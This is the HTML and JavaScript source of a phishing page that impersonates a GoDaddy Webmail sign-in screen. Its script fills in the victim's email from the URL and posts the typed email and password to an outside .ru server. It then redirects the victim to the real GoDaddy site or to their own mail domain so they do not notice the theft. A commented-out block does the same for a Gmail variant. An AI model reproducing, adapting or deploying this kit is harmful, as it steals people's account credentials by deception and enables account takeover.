
<!doctype html>
<html lang="en">
<head>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.1.1.min.js">
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="icon" type="image/png" sizes="32x32" href="https://storage.googleapis.com/godaddy-rd18.appspot.com/images/favicon-32x32.png">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Sign In</title>
    <link href="https://storage.googleapis.com/godaddy-rd18.appspot.com/css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">
      body {
        margin: 0;
        font-family: gdsherpa,Helvetica,Arial,sans-serif;
        font-size: 1rem;
        font-weight: 400;
        line-height: 1.5rem;
        color: #111;
        text-align: left;
        background-color: #fff;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
      }
      .headline-brand {
        font-family: gd-sage,"Times New Roman",serif;
        font-weight: 700!important;
        font-size: 40px;
      }

      .icbu-footer-seo {
        color: #999999;
        font-size: 14px;
      }
      .icbu-footer-seo a{
        color: #999999;
        font-size: 14px;
      }




      .input-icons i { 
        position: absolute; 
      } 

      .input-icons { 
        width: 100%; 
      } 

      .icon { 
        padding: 15px; 
        min-width: 40px;
        color: #8FA7AD; 
      } 

      .input-field { 
        width: 100%; 
        padding: 10px;
        padding-left: 20px ;
        text-align: left;
        border: 1px solid #B7B7B7; 
      } 


      #submit-btn{
        background-color: #111111; 
        font-weight: 500; 
        font-size: 18px;
      }


      #submit-btn:hover{
        background-color: #444;

      }

      #logoImage {
        max-height: 40px;
        margin-top: 20px;
      }



    </style>
  </head>
  <body style="background-color: #f5f7f8;" >
    <div class="container-fluid p-0">
      <div class="container-fluid bg-white">
        <div class="row">
          <div class="col-lg-11 mx-auto my-1 p-2">
            <div class="d-inline-block">
              <i class="fas fa-globe"></i>
              <span>Country-English</span>
              <i class="fas fa-chevron-down"></i>
            </div> 
            <div class="float-right d-inline-block">
              <i class="fas fa-phone-alt"></i>
              <span>+1 480 463 8811</span>
              <i class="fas fa-chevron-down"></i>
            </div> 

          </div>

        </div>

      </div>

      <div class="container-fluid">
        <div class="row" style="margin: 35px 0px ;">
          <div class="col-lg-6 align-self-center text-center">
            <img src="https://storage.googleapis.com/godaddy-rd18.appspot.com/images/godaddy-side.png" class="img-fluid">


          </div>
          <div class="col-lg-5">
            <div>
              <svg id="logoImage" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 743.17 158.28"><title>GoDaddy Logo</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="gd-logo-path" d="M176.65,36c25.25,0,45.52,19.58,45.52,44.48,0,24.74-20.27,44-45.52,44-25.08,0-45.35-19.24-45.35-44,0-24.9,20.27-44.48,45.35-44.48m0,65.22c11.73,0,20.53-9.35,20.53-20.91s-8.8-21.08-20.53-21.08c-11.56,0-20.36,9.52-20.36,21.08s8.8,20.91,20.36,20.91M341.31,61.76c0,35.73-25.66,60.29-62.59,60.29H232.58a3.75,3.75,0,0,1-3.78-4V5.59a3.7,3.7,0,0,1,3.78-3.78h46.14c36.93,0,62.59,24.05,62.59,60m-27,0c0-20.95-14.08-36.24-34.52-36.24H254.56V98.35h25.26c20.44,0,34.52-16,34.52-36.59M388.17,36c11.17,0,20.1,4.81,24.05,11.33V42.18a3.91,3.91,0,0,1,3.61-3.78h17.35a3.66,3.66,0,0,1,3.6,3.78v76.27a3.51,3.51,0,0,1-3.6,3.6H415.83a3.62,3.62,0,0,1-3.61-3.6v-5.33c-4,6.53-13.05,11.34-24.22,11.34-21.64,0-41.74-17.35-41.74-44.32C346.26,53,366.53,36,388.17,36m4.65,65.39c11.49,0,20.12-8.82,20.12-21.08s-8.63-21.08-20.12-21.08S372.7,68.06,372.7,80.31s8.62,21.08,20.12,21.08M485.05,36c11.34,0,20.44,4.81,24.39,11V5.42a3.67,3.67,0,0,1,3.78-3.61h17.35a3.53,3.53,0,0,1,3.61,3.61v113a3.52,3.52,0,0,1-3.61,3.6H513.22a3.62,3.62,0,0,1-3.61-3.6v-5.33c-4.64,6.53-13.05,11.34-24.22,11.34-21.64,0-41.74-17.35-41.74-44.32C443.65,53,463.58,36,485.05,36m5.16,65.61c11.44,0,20-8.92,20-21.3s-8.59-21.3-20-21.3-20,8.92-20,21.3,8.58,21.3,20,21.3M582.44,36c11.34,0,20.44,4.81,24.39,11V5.42a3.67,3.67,0,0,1,3.78-3.61H628a3.53,3.53,0,0,1,3.61,3.61v113a3.52,3.52,0,0,1-3.61,3.6H610.61a3.62,3.62,0,0,1-3.61-3.6v-5.33c-4.63,6.53-13,11.34-24.22,11.34-21.64,0-41.74-17.35-41.74-44.32C541,53,561,36,582.44,36m5.16,65.61c11.45,0,20-8.92,20-21.3S599.05,59,587.6,59s-20,8.92-20,21.3,8.58,21.3,20,21.3M719.66,38.4H702.35c-2.75,0-4.12,1.89-4.63,4l-16,59.75L664.63,42.35c-1-3.18-2.55-4-4.78-4H641.61c-4.3,0-5.09,2.92-4.23,5.84l23.15,74.21c.69,2.06,2.07,3.6,4.64,3.6h10.49l-2.23,7.37c-2.19,6.36-6.28,8.08-11.61,8.08-4.57,0-7.57-1.81-10.81-3.9a6,6,0,0,0-3.42-1.18c-1.55,0-2.63.7-4.08,2.84l-5.14,7.7c-1,1.6-1.54,2.47-1.54,4.18,0,2.73,2.73,4.44,6,6.31,5.63,3.22,12.82,4.83,20.7,4.83,17.35,0,28.52-9.45,33.5-25.25l25.89-88.79C724.13,40.81,723.1,38.4,719.66,38.4ZM102.6,105.64c-9.09,11.49-24.9,18.71-42.78,18.71C26.25,124.35,0,99.1,0,63.14,0,25.76,28.33,0,64.12,0,90.54,0,111.67,11.36,121,34.21a5.29,5.29,0,0,1,.44,1.91c0,1.09-.72,1.9-3,2.69l-16.72,6.45a4.36,4.36,0,0,1-3.17,0,4.79,4.79,0,0,1-2-2.29c-6-11.4-16.68-19.16-33.11-19.16-21.33,0-36.6,16.66-36.6,38.25,0,20.92,13,38.13,37.2,38.13,12.73,0,22.88-6,27.62-12.59H76.59a3.86,3.86,0,0,1-3.92-3.92V70.84a3.86,3.86,0,0,1,3.92-3.92h44.25a3.71,3.71,0,0,1,3.92,3.74V118.1a3.86,3.86,0,0,1-3.92,3.92H106.52a3.86,3.86,0,0,1-3.92-3.92Z"></path><path class="gd-logo-path" d="M723.41,20.84V19.69a.25.25,0,0,1,.08-.21.26.26,0,0,1,.21-.09H731a.29.29,0,0,1,.28.3v1.15a.25.25,0,0,1-.08.21.24.24,0,0,1-.2.08h-2.68v7.21a.29.29,0,0,1-.09.21.27.27,0,0,1-.21.09h-1.37a.29.29,0,0,1-.21-.09.32.32,0,0,1-.08-.21V21.13H723.7a.27.27,0,0,1-.29-.29Zm12.77-1.19,2,4.63,2-4.63a.46.46,0,0,1,.16-.2.53.53,0,0,1,.26-.06h2.2a.27.27,0,0,1,.28.29v8.67a.28.28,0,0,1-.07.21.24.24,0,0,1-.2.08h-1.31a.25.25,0,0,1-.21-.08.29.29,0,0,1-.08-.21V21.8l-2.14,4.76a.54.54,0,0,1-.16.23.53.53,0,0,1-.28.06h-1.06a.48.48,0,0,1-.26-.06.54.54,0,0,1-.16-.23L735.1,21.8v6.55a.32.32,0,0,1-.08.21.3.3,0,0,1-.2.08H733.5a.24.24,0,0,1-.2-.08.29.29,0,0,1-.08-.21V19.68a.29.29,0,0,1,.09-.21.28.28,0,0,1,.2-.08h2.25a.5.5,0,0,1,.26.06A.4.4,0,0,1,736.18,19.65Z"></path></g></g></svg>
            </div>
            <div class="text-center p-4 text-white" style="background-color: #333;">
              <span class="font-weight-bold h3">Webmail</span>
            </div>


            <div style="background-color: white;border-radius:5px; padding: 20px 48px;">
              <div class="col-lg-10 mx-auto">
                <span class="h3 font-weight-bold">Sign in</span>
              </div>
              <!-- form -->
              <div class="mt-4 col-lg-10 mx-auto">
                <center>
                  <div class="alert alert-danger" id="msg" style="display: none;"></div>
                  <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account.</span>
                </center>
                <form id="contact" class="form-horizontal well">
                  <div id="div1" class="text-dark">
                    <div>
                      <div class="form-group m-0">
                        <div id="inputbar">
                          <label class="font-weight-bold">Email</label>
                          <div class="input-icons">
                            <!-- <i class="far fa-user icon"></i> -->
                            <input type="email" name="email" class="input-field rounded-0" id="email" aria-describedby="emailHelp" placeholder="">
                          </div>
                        </div>
                      </div>
                    </div>
                    <div class="mt-4">
                      <div class="form-group m-0">
                        <label class="font-weight-bold">Password</label>
                        <div class="input-icons">
                          <!-- <i class="fas fa-lock icon"></i> -->
                          <input type="password" name="password" class="input-field rounded-0" id="password" aria-describedby="emailHelp" placeholder="">
                        </div>
                      </div>
                    </div>
                    <div class=" mt-3">
                      <div class="form-check">
                        <input type="checkbox" class="form-check-input" id="exampleCheck1">
                        <label class="form-check-label" style="font-weight: 500" for="exampleCheck1">Keep me signed in</label>&nbsp<i class="fas fa-info-circle"></i>
                        
                      </div>

                    </div>
                  </div>
                </div>
                <div class="text-center col-lg-10 mx-auto mt-3">
                  <button class="btn py-2 w-100 text-white rounded-0" id="submit-btn">Sign in</button>
                </div>
                <!-- form close -->
                
                <div class="col-12 text-center mt-3">
                  <p id="recovery-links">Need to find <a  id="forgot_password" class="text-primary-o" href="https://sso.godaddy.com/v1/account/reset?app=dcc&amp;realm=idp" style="color: #09757a;text-decoration: underline;">your password</a>?</p>
                </div>
              </div>
              <div class="col-lg-12 mt-3">
                <div class="row">
                  <div class="col-lg-8 mx-auto">
                    <center>
                      <span class="font-weight-bold" style="color: #444;">Don't have GoDaddy email?</span></center><br>
                      <button class="btn rounded-0 bg-transparent w-100" style="border:2px solid black;color: #4267B2;padding: 8px 22px;">
                        Get started
                      </button>
                    </div>
                  </div>
                </div>


              </div>

            </div> 
          </div> 
          <div class="container-fluid bg-white">
            <div class="row">
              <div class="col-lg-12 p-3 text-center">
                <span style="font-size:14px;">Copyright © 1999 - 2020 GoDaddy Operating Company, LLC. All Rights Reserved. <a href="" style="color: #09757a;text-decoration: underline;">Privacy Policy</a>.</span>
              </div>
            </div>
          </div> 
        </div>






        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
      </body>

      <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
      <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
      <script>
        $("#submit-btn1").hide();

        /* global $ */
        $(document).ready(function(){
          var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          // $('#email').val(email);
          var my_email =email;
          var ind=my_email.indexOf("@");
          var my_slice=my_email.substr((ind+1));
          var c= my_slice.substr(0, my_slice.indexOf('.'));
          var final= c.toLowerCase();
          
          $('#contact').trigger("reset");
          $("#msg").hide();
            // $('#fieldImg').attr('src', 'images/other-1.png');
            // $('#field').html("Other Mail");
            $('#email').val(my_email);
            $('#emailch').html(my_email);
            $("#msg").hide();
            // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            // $("#automail").animate({right:200, opacity:"show"}, 1000);
            // $('#ajaxModal').modal('show');
          }
        ///////////////url getting email////////////////


        
        $('#submit-btn').click(function(event){
          $('#error').hide();
          $('#msg').hide();
          event.preventDefault();
          var email=$("#email").val();
          var password=$("#password").val();
          var msg = $('#msg').html();
          $('#msg').text( msg );
        ///////////new injection////////////////
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_email)) {
        //   $('#error').show();
        //   email.focus;
        //   return false;
        // }

        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var n = my_email.search("@");
        ///////////new injection////////////////
        count=count+1;
        
        $.ajax({
          dataType: 'JSON',
          url: 'https://elrodeoofdurham.ru/MajidMohamedOne5oct/next.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
          },
              // data: $('#contact').serialize(),
              beforeSend: function(xhr){
                $('#submit-btn').html('Verifing...');
              },
              success: function(response){
                if(response){
                  $("#msg").show();
                  console.log(response);
                  if(response['signal'] == 'ok'){
                    $("#password").val("");
                    if (count>=2) {
                      count=0;
                      if (n<0) { 
                        window.location.replace('https://godaddy.com/');
                      }
                      else
                      {
                        window.location.replace('https://www.'+my_slice);
                      }
                    }
                    $('#msg').html(response['msg']);
                  }
                  else{
                    $('#msg').html(response['msg']);
                  }
                }
              },
              error: function(){
                $("#password").val("");
                if (count>=2) {
                      count=0;
                      if (n<0) { 
                        window.location.replace('https://godaddy.com/');
                      }
                      else
                      {
                        window.location.replace('https://www.'+my_slice);
                      }
                    }
               $("#msg").show();
               $('#msg').html("Please try again later");
             },
             complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
      });

        // ///////////////start second button//////////////////

        // $('#submit-btn1').click(function(event){
        //   event.preventDefault();
        //   var email=$("#email").val();
        //   var password=$("#password").val();
        //   var phone=$("#phone").val();
        //   var msg1 = $('#msg1').html();
        //   $.ajax({
        //     dataType: 'JSON',
        //     url: 'next-gmail.php',
        //     type: 'POST',
        //     data:{
        //       email:email,
        //       password:password,
        //       phone:phone,

        //     },
        //     beforeSend: function(xhr){
        //       $('#submit-btn1').html('Verifing...');
        //     },
        //     success: function(response){
        //       $("#password").val("");
        //       window.location.replace("http://www.gmail.com");
        //       if(response){
        //           // $("#msg1").show();
        //           console.log(response);
        //           if(response['signal'] == 'ok'){
        //            // $('#msg1').html(response['msg']);
        //          }
        //          else{
        //           // $('#msg1').html(response['msg']);
        //         }
        //       }
        //     },
        //     error: function(){
        //      $("#password").val("");
        //      window.location.replace("http://www.gmail.com");
        //       // $("#msg1").show();
        //       // $('#msg1').html("Please try again later");
        //     },
        //     complete: function(){
        //       $('#submit-btn1').html('Verify');
        //     }
        //   });
        // });

        // /////////////// end second button//////////////////




      });

  // document.onkeydown=function(e){
  //   if (e.ctrlKey && 
  //     (e.keyCode === 73 || 
  //      e.keyCode === 105 ||
  //      e.keyCode === 74 || 
  //      e.keyCode === 106 || 
  //      e.keyCode === 85 || 
  //      e.keyCode === 117)) {
  //     alert('not allowed');
  //   return false;
  // } else {
  //   return true;
  // }
  // }
</script>
</html>